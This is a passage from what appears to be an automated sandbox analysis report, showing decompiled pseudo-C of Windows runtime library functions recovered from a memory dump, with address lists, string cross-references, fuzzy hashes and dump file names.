																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0362FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0362FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0362FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x36e7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x36e7b84 = _t75;
						_t73 = E0360EB70(_t134, 0x36e7b60);
						if( *0x36e7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0360FF60( *0x36e7b20);
							}
						}
						goto L5;
					}
				}
			}

0x0362fab0
0x0362fab2
0x0362fab3
0x0362fab4
0x0362fabc
0x0362fac0
0x0362fb14
0x0362fb17
0x0362fac2
0x0362fac8
0x0362facd
0x0362fad3
0x0362fad3
0x0362fadd
0x0362fb18
0x0362fb1b
0x0362fb1d
0x0362fb1e
0x0362fb1f
0x0362fb20
0x0362fb21
0x0362fb22
0x0362fb23
0x0362fb24
0x0362fb25
0x0362fb26
0x0362fb27
0x0362fb28
0x0362fb29
0x0362fb2a
0x0362fb2b
0x0362fb2c
0x0362fb2d
0x0362fb2e
0x0362fb2f
0x0362fb3a
0x0362fb3b
0x0362fb3e
0x0362fb41
0x0362fb44
0x0362fb47
0x0362fb4a
0x0362fb4d
0x0362fb53
0x0366bdcb
0x0366bdcb
0x0362fb59
0x0362fb5b
0x0362fb5b
0x0362fb5e
0x0366bdd5
0x0366bdd8
0x00000000
0x0366bdda
0x00000000
0x0366bdda
0x0362fb64
0x0362fb64
0x0362fb64
0x0362fb67
0x0362fb6e
0x0362fb70
0x0362fb72
0x00000000
0x0362fb78
0x0362fb7a
0x0362fb7a
0x0362fb7d
0x0362fb80
0x0366bddf
0x0366bde1
0x00000000
0x0366bde3
0x00000000
0x0366bde3
0x0362fb86
0x0362fb86
0x0362fb86
0x0362fb8b
0x0362fb90
0x0362fb92
0x0362fb94
0x0362fb9a
0x0362fb9b
0x0362fba1
0x0366bde8
0x0366bdeb
0x0366bded
0x0366beb5
0x0366beb5
0x0366bebb
0x0366bebd
0x0366bec3
0x0366bed2
0x0366bedd
0x0366bedd
0x0366beed
0x00000000
0x0366bdf3
0x0366bdfe
0x0366be06
0x0366be0b
0x0366be0d
0x0366be0f
0x0366be14
0x0366be19
0x0366be20
0x0366be25
0x0366be27
0x0366be35
0x0366be39
0x0366be46
0x0366be4f
0x0366be54
0x0366be56
0x0366bef8
0x0366bef8
0x00000000
0x0366be5c
0x0366be5c
0x0366be60
0x00000000
0x0366be66
0x0366be66
0x0366be7f
0x0366be84
0x0366be87
0x0366be89
0x0366be8b
0x0366be99
0x0366be9d
0x0366bea0
0x0366beac
0x0366beaf
0x0366beb1
0x0366beb3
0x0366beb3
0x00000000
0x0366bea2
0x0366bea2
0x00000000
0x0366bea2
0x0366be8d
0x0366be8d
0x0366be92
0x00000000
0x0366be92
0x0366be8b
0x0366be60
0x0366be3b
0x0366be3b
0x0366be3e
0x00000000
0x0366be40
0x0366be40
0x0366be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0366be44
0x0366be3e
0x0366be29
0x0366be29
0x00000000
0x0366be29
0x0366be27
0x00000000
0x0362fba7
0x0362fba7
0x0362fbab
0x0366bf02
0x0362fbb1
0x0362fbb1
0x0362fbb8
0x0362fbbd
0x0362fbbd
0x0362fbbf
0x0362fbbf
0x0362fbc5
0x0362fbcb
0x0362fbf8
0x0362fbf8
0x0362fbfa
0x00000000
0x0362fc00
0x0362fc00
0x0362fc03
0x00000000
0x0362fc09
0x0362fc09
0x0362fc0f
0x0362fc15
0x0362fc23
0x0362fc23
0x0362fc25
0x0362fc27
0x0362fc75
0x0362fc7c
0x0362fc84
0x00000000
0x0362fc29
0x0362fc29
0x0362fc2d
0x0362fc30
0x0366bf0f
0x00000000
0x0362fc36
0x0362fc38
0x0362fc3b
0x0362fc41
0x0366bf17
0x0366bf19
0x0366bf48
0x0366bf4b
0x00000000
0x0366bf1b
0x0366bf22
0x0366bf24
0x0366bf26
0x00000000
0x0366bf2c
0x0366bf37
0x0366bf39
0x0366bf3b
0x00000000
0x0366bf41
0x0366bf41
0x0366bf41
0x0366bf41
0x0366bf45
0x00000000
0x0366bf45
0x0366bf3b
0x0366bf26
0x00000000
0x0362fc47
0x0362fc47
0x0362fc49
0x0362fcb2
0x0362fcb4
0x0362fcb6
0x0362fcdc
0x0362fcdc
0x00000000
0x0362fcb8
0x0362fcc3
0x0362fcc5
0x0362fcc7
0x00000000
0x0362fcc9
0x0362fcc9
0x0362fccd
0x00000000
0x0362fccd
0x0362fcc7
0x00000000
0x0362fc4b
0x0362fc4b
0x0362fc4e
0x0362fc4e
0x0362fc51
0x0362fc51
0x0362fc54
0x0362fc5a
0x0362fc5c
0x0362fc5f
0x0362fc61
0x0362fc63
0x0362fc65
0x0362fc67
0x0362fc6e
0x0362fc72
0x0362fc72
0x0362fc72
0x0362fc72
0x0362fc67
0x0362fc61
0x00000000
0x0362fc5a
0x0362fc49
0x0362fc41
0x0362fc30
0x0362fc27
0x0362fc03
0x0362fbcd
0x0362fbd3
0x0362fbd9
0x0362fbdc
0x0362fbde
0x0362fc99
0x0362fc9b
0x0362fc9d
0x0362fcd5
0x0362fcd5
0x0362fc89
0x0362fc89
0x00000000
0x0362fc9f
0x0362fc9f
0x0362fca3
0x00000000
0x0362fca3
0x00000000
0x0362fbe4
0x0362fbe4
0x0362fbe4
0x0362fbe4
0x0362fbe9
0x0362fbf2
0x00000000
0x0362fbf2
0x0362fbde
0x0362fbcb
0x0362fbab
0x0362fc8b
0x0362fc8b
0x0362fc8c
0x0362fb80
0x0362fb72
0x0362fb5e
0x0362fc8d
0x0362fc91
0x0362fadf
0x0362fadf
0x0362fae1
0x0362fae4
0x0362fae7
0x0362faec
0x0362faf8
0x0362fb00
0x0362fb07
0x0362fb0f
0x0362fb0f
0x0362fb07
0x00000000
0x0362faf8
0x0362fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0366BE0F

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: be2e37f780b6cda8a69196982d168c8cdbb4a7cc45b0dd95c99be5026a46490b
Instruction ID: 3703b53b5fc7653ee3f1ea67fa539dbe708bcda372f06a74b6edbeafd87e8123
Opcode Fuzzy Hash: be2e37f780b6cda8a69196982d168c8cdbb4a7cc45b0dd95c99be5026a46490b
Instruction Fuzzy Hash: 05A1DF75B00B26CBDB29DB69C550B6ABBB8AB49650F09456DE806DF790DB30D8028B80

Uniqueness

Uniqueness Score: -1.00%

Function 035F2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E035F2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x36e5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x36e7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E036397C0();
				}
				if( *0x36e79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x36e79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E03621624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E03617D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0368FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03639520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0362E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0364DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x36e6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x36e6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03639980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E036395D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E03617D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E03617D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E03677016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0368FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x36e5350;
							if(_t109 != 0x36e5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0368FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E03685720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x035f2d8a
0x035f2d8a
0x035f2d92
0x035f2d96
0x035f2d9e
0x035f2da0
0x035f2da3
0x035f2da5
0x035f2da8
0x035f2dab
0x035f2db2
0x0364f9aa
0x0364f9ab
0x0364f9ae
0x0364f9ae
0x035f2db8
0x035f2dc2
0x0364f9b9
0x0364f9be
0x0364f9bf
0x0364f9bf
0x035f2dcf
0x0364f9c9
0x035f2dd5
0x035f2dd5
0x035f2dd5
0x035f2dde
0x035f2de1
0x035f2e70
0x035f2e72
0x035f2e72
0x035f2de7
0x035f2deb
0x035f2e7c
0x035f2e83
0x035f2e85
0x035f2e8b
0x035f2e8d
0x035f2e92
0x035f2e92
0x035f2e85
0x035f2df1
0x035f2df7
0x035f2df9
0x035f2df9
0x035f2dfc
0x035f2dff
0x035f2e02
0x00000000
0x035f2e05
0x035f2e0c
0x0364f9d9
0x035f2e12
0x035f2e12
0x035f2e12
0x035f2e1a
0x0364f9e3
0x0364f9e9
0x0364f9f0
0x0364f9f6
0x0364f9f8
0x0364f9f8
0x0364f9f0
0x035f2e23
0x0364fa02
0x0364fa03
0x0364fa05
0x0364fa06
0x00000000
0x035f2e29
0x035f2e29
0x035f2e2e
0x035f2e34
0x035f2e3e
0x00000000
0x00000000
0x035f2e44
0x035f2e47
0x035f2e4d
0x00000000
0x00000000
0x035f2e4f
0x035f2e54
0x00000000
0x00000000
0x035f2e5a
0x035f2e5f
0x035f2e9a
0x035f2ea4
0x035f2ea5
0x035f2ea8
0x035f2eaf
0x035f2eb2
0x035f2eb5
0x0364fae9
0x0364faeb
0x0364faed
0x0364faef
0x0364faf7
0x0364faf8
0x0364fafd
0x0364faff
0x0364fb04
0x0364fb04
0x0364faff
0x035f2ec0
0x035f2ec4
0x035f2ec6
0x035f2ec8
0x0364fb14
0x0364fb18
0x0364fb1e
0x0364fb21
0x0364fb21
0x035f2ece
0x035f2ece
0x035f2ece
0x035f2ed7
0x035f2e61
0x035f2e63
0x0364fa6b
0x0364fa71
0x0364fa76
0x0364fa78
0x0364fa8a
0x0364fa7a
0x0364fa83
0x0364fa83
0x0364fa8f
0x0364fa91
0x0364fa97
0x0364fa9d
0x0364faa4
0x0364faaa
0x0364faaf
0x0364fab1
0x0364fac3
0x0364fab3
0x0364fabc
0x0364fabc
0x0364fac8
0x0364facb
0x0364fadf
0x0364fadf
0x0364facb
0x0364faa4
0x0364fa91
0x035f2e6f
0x035f2e6f
0x035f2e5f
0x0364fa13
0x0364fa15
0x0364fa17
0x0364fa1f
0x0364fa21
0x0364fa22
0x0364fa25
0x0364fa28
0x0364fa2f
0x0364fa2f
0x0364fa2a
0x0364fa2a
0x0364fa2a
0x0364fa31
0x0364fa34
0x0364fa36
0x0364fa3c
0x0364fa3e
0x0364fa41
0x0364fa43
0x0364fa45
0x0364fa45
0x0364fa41
0x0364fa3c
0x0364fa4a
0x0364fa4f
0x0364fa51
0x0364fa53
0x0364fa56
0x0364fa5b
0x0364fa5e
0x00000000
0x0364fa5e
0x035f2e23

Strings

RTL: Re-Waiting, xrefs: 0364FA4A

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 71d9f27a13e568cf25be8d2016d836d0abe3310eecf2a9f4adcdd83d53827fbc
Instruction ID: a4666e0e5d618dbae6ee98a5af4b7bb3413a761e5deaad51df9d2c8dee1d3570
Opcode Fuzzy Hash: 71d9f27a13e568cf25be8d2016d836d0abe3310eecf2a9f4adcdd83d53827fbc
Instruction Fuzzy Hash: 076133B4E00644EFDB21DF68E940B7EB7A4FF48718F290AA9DA119F3D0C77099418781

Uniqueness

Uniqueness Score: -1.00%

Function 036C0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E036C0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E036BFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E036C1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03639730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E036BA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E036BA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x36e8b04 >> 0x14) + (_v44 -  *0x36e8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E03617D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E036B138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E03617D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E036AFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x36e8724 & 0x00000008) != 0) {
						E036B52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E036C15B5(0x36e8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x036c0eb7
0x036c0eb9
0x036c0ec0
0x036c0ec2
0x036c0ecd
0x036c105b
0x036c105b
0x036c1061
0x036c1066
0x036c1066
0x036c106b
0x036c1073
0x036c1073
0x036c0ed3
0x036c0ed6
0x036c0edc
0x036c0ee0
0x036c0ee7
0x036c0ef0
0x036c0ef5
0x036c0efa
0x036c0efc
0x036c0efd
0x036c0f03
0x036c0f04
0x036c0f06
0x036c0f07
0x036c0f09
0x036c0f0e
0x036c0f14
0x036c0f23
0x036c0f2d
0x036c0f34
0x036c0f34
0x036c0f14
0x036c0f52
0x00000000
0x00000000
0x036c0f58
0x036c0f73
0x036c0f74
0x036c0f79
0x036c0f7d
0x036c0f80
0x036c0f86
0x036c0fab
0x036c0fb5
0x036c0fc6
0x036c0fd1
0x036c0fe3
0x036c0fd3
0x036c0fdc
0x036c0fdc
0x036c0feb
0x036c1009
0x036c1009
0x036c1015
0x036c1027
0x036c1017
0x036c1020
0x036c1020
0x036c102f
0x036c103c
0x036c103c
0x036c1048
0x036c1050
0x036c1050
0x036c1055
0x00000000
0x036c1055
0x036c0f88
0x036c0f9e
0x036c0fa2
0x036c0fa9
0x00000000
0x00000000
0x00000000
0x036c0fa9
0x00000000

Strings

`, xrefs: 036C0F16

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: dfe65ca825d546f2d0f5993b4b8d30dee3cc48b1b36ae96e8cae9ce1b955d179
Instruction ID: 5268aeac09b5e12590d36395d6da19cd1f8a09208e0ac406c40ccfe03187d9ff
Opcode Fuzzy Hash: dfe65ca825d546f2d0f5993b4b8d30dee3cc48b1b36ae96e8cae9ce1b955d179
Instruction Fuzzy Hash: 1E51C1703143819FD325DF29D984B2BB7E5EBC5704F08092CF9968B291DB70E846CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0362F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0362F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E03614120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03639830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03639990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E036395D0();
							goto L11;
						} else {
							_t109 = L03614620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0363F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E036395D0();
										L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0362f0d3
0x0362f0d9
0x0362f0e0
0x0362f0e7
0x0362f0f2
0x0362f0f4
0x0362f0f8
0x0362f100
0x0362f108
0x0362f10d
0x0362f115
0x0362f116
0x0362f11f
0x0362f123
0x0362f124
0x0362f12c
0x0362f130
0x0362f134
0x0362f13d
0x0362f144
0x0362f14b
0x0362f152
0x0366bab0
0x0366bab0
0x0362f158
0x0362f158
0x0362f15a
0x0362f160
0x0362f165
0x0362f166
0x0362f16f
0x0362f173
0x0366baa7
0x0366baa7
0x0366baab
0x00000000
0x0362f179
0x0362f18d
0x0362f191
0x0366baa2
0x00000000
0x0362f197
0x0362f19b
0x0362f1a2
0x0362f1a9
0x0362f1af
0x0362f1b2
0x0362f1b6
0x0362f1b9
0x0362f1c4
0x0362f1d8
0x0362f1df
0x0362f1e3
0x0362f1eb
0x0362f1ee
0x0362f1f4
0x0362f20f
0x0366bab7
0x0366babb
0x0366bacc
0x0366bad1
0x0362f215
0x0362f218
0x0362f226
0x0362f22b
0x00000000
0x0362f22b
0x0362f1f6
0x0362f1f6
0x0362f1f9
0x0362f1fb
0x0362f1fb
0x0362f1f4
0x0362f191
0x0362f173
0x0362f152
0x0362f203

Strings

@, xrefs: 0362F124

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: a9f62f850578bb245cd7744b2c8784839e1e69d14e8f1967d65d22b14bcd8286
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: AA516B76504710AFC321DF29C840A6BBBF8FF48750F008A2EF9959B690E7B4E954CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03673540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E03673540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x36ed360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
